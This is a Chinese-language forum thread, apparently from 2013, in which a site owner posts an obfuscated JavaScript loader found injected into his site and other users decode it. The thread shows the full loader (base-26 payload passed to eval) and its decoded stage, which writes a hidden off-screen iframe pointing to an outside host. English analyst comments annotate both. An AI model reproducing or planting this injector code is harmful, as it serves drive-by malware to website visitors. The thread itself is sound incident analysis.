求 JS 代码解密方法

2013-01-04 18:41:38 +08:00
 54dev
代码如下
// Start of an injected block. The same 32-hex-character comment appears again
// after the block, so the pair brackets exactly what was inserted; searching
// the web root for this marker string is a direct way to list affected files.
/*9769d9906bb1e2e6b5c473f404ad0ffd*/
// Probe 1: multiply-assign document.body by document. zxc=1 and ww=window are
// set only in the catch handler, i.e. only when this assignment throws.
// Property names are split ("b"+"ody") so a plain-text search for "body" misses them.
// NOTE(review): presumably an anti-emulation check, since the later stage needs
// both ww and zxc and stays inert when the assignment is silently accepted — confirm.
try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}
// Probe 2: create a <span>; if createElement throws, zxc is reset to 0, which
// disables the decode loop in the statement that follows (it is guarded by if(zxc)).
// d is assigned here and not read again in the visible code.
try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}
// Decode-and-run stage of the injected loader.
// The try body assigns a string to document.body; all of the real work is in
// the catch handler, so the payload is decoded only when that assignment throws.
//   n      : the payload, one character per entry, each entry a base-26 numeral
//            string (the radix is written as 12*2+2 so the constant 26 never appears).
//   loop   : i runs from 0 to 613 (condition i-614!=0) and appends
//            String.fromCharCode(parseInt(n[i],26)) to s; it is skipped when zxc is falsy.
//   sink   : vl="val", so ww["e"+vl](z) resolves to window.eval(z) on the decoded text.
//   v,h,k  : assigned but never read in this block (filler).
// The payload can be recovered without running anything: convert each entry of n
// from base 26 to a character code and concatenate.
// NOTE(review): as captured on this page the array literal is split across two
// lines in the middle of one entry (`"` / `1l"`); likely a wrapping artifact of
// the page rather than part of the sample — the text is kept exactly as captured.
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","
1l","1l","4a","3n","44","41","3j","3k","44","4h","4a","3n","3k","4a","47","3j","3m","3l","3j","4b","4c","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-614!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}
// End of the injected block: same marker comment as the one that opens it.
// Deleting the text between the two markers removes the symptom only; how the
// files were modified (per the thread, site JS and index.php) still has to be
// found and closed, otherwise the block can simply be written back.
/*9769d9906bb1e2e6b5c473f404ad0ffd*/
11 条回复
shiny
2013-01-04 18:46:30 +08:00
最后一句:
ww是window
"e"+vl是eval
z是
// Decoded second stage: the text the loader hands to eval (the variable z),
// recovered here by printing it instead of executing it.

// gra(a,b): random integer between a and b, both ends included.
function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
// rs(): random token — Math.random() rendered in base 36, from character index 5 on.
function rs(){return Math.random().toString(36).substring(5);}
// Once-per-visitor gate: runs only when cookies are enabled and no
// 'testcookie1=' entry is present in document.cookie.
if(navigator.cookieEnabled && document.cookie.indexOf('testcookie1=')==-1){
// Random class suffix, so the generated class name differs on every page load.
var stnm=rs();
// Writes a <style> rule that positions the class absolutely at left/top offsets
// of -600..-1000 px (off the visible page), then a <div> of that class holding
// an <iframe> with a random 300..600 px width and height. The visitor's browser
// loads the iframe URL without anything showing on the page. The iframe host and
// path are the network indicators to look for in proxy, DNS and web-server logs.
document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://reliablyrebroadcast.org/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
// Sets testcookie1 with a 7-day expiry, so the gate above suppresses the
// injection for a week for the same browser. Consequence for triage: a second
// visit from the same browser will not reproduce the iframe unless the cookie is cleared.
var exp=new Date();exp.setDate(exp.getDate()+7);
document.cookie='testcookie1='+rs()+'; expires='+exp.toGMTString();
}

直接chrome里console.log就出来了。
54dev
2013-01-04 20:29:35 +08:00
@shiny 网站的JS和INDEX.PHP都被感染了。我晕,应该怎么办。
enj0y
2013-01-04 21:02:20 +08:00
写个脚本,sed -i 替换回去。
fanpenghua
2013-01-04 21:09:16 +08:00
弄居然没Backup ,不行呀。
54dev
2013-01-05 10:10:10 +08:00
@enj0y 是哪个文件感染的还没有查到,SHELL应该怎么写呢
54dev
2013-01-05 10:10:31 +08:00
@fanpenghua 什么意思啊。
metalbug
2013-01-05 10:28:58 +08:00
有病啊,人家之所以加密就是不想让你们看,靠
54dev
2013-01-05 10:47:14 +08:00
@metalbug 一边趴着去。
Mutoo
2013-01-05 17:04:30 +08:00
@metalbug 显示是服务器被挂马了。
metalbug
2013-01-05 19:08:06 +08:00
啊,哈哈,原来挂马了,哈哈哈,恭喜你
fanzeyi
2013-01-05 19:22:08 +08:00


点进这个帖子还要关ESET …… 诶..
